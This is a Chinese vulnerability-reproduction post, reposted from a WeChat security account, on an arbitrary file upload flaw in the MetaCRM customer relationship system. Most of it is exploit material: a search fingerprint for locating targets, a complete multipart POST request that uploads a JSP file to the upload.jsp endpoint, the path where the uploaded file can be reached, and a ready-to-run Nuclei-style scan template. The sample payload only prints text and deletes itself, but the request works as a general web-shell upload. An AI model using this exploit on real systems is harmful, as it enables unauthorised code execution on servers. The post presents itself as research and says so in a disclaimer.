资产收集
body="/common/scripts/basic.js"
漏洞复现
构造请求包
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null& HTTP/1.1
Host:
Content-Length: 768
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Referer: http://0.0.0.0/develop/systparam/softlogo/file2.jsp
Connection: close
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="file"; filename="klms.jsp"
Content-Type: text/plain
<% out.print("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="key"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="form"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="field"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="filetitile"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="filefolder"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh--
返回包
拼接url
http://host/userfile/default/userlogo/klms.jsp
脚本
id: ZH-2024-05-09-001 info: name: MetaCRM客户关系管理系统存在任意文件上传漏洞 author: Devil安全 reference: https://mp.weixin.qq.com/s/r5vOIl2sp_GEVcl8VSu6mg requests: - raw: - | POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null& HTTP/1.1 Host:{{Hostname}} Content-Length: 768 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Referer: http://0.0.0.0/develop/systparam/softlogo/file2.jsp Connection: close ------WebKitFormBoundary0Mh3BfgWszxRFokh Content-Disposition: form-data; name="file"; filename="klms.jsp" Content-Type: text/plain <% out.print("Hello");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> ------WebKitFormBoundary0Mh3BfgWszxRFokh Content-Disposition: form-data; name="key" null ------WebKitFormBoundary0Mh3BfgWszxRFokh Content-Disposition: form-data; name="form" null ------WebKitFormBoundary0Mh3BfgWszxRFokh Content-Disposition: form-data; name="field" null ------WebKitFormBoundary0Mh3BfgWszxRFokh Content-Disposition: form-data; name="filetitile" null ------WebKitFormBoundary0Mh3BfgWszxRFokh Content-Disposition: form-data; name="filefolder" null ------WebKitFormBoundary0Mh3BfgWszxRFokh-- matchers: - type: word words: - "/userfile/default/userlogo/klms.jsp" condition: and part: body
ZH-2024-05-09-001
原文始发于微信公众号(Devil安全):【漏洞复现】MetaCRM客户关系管理系统存在任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论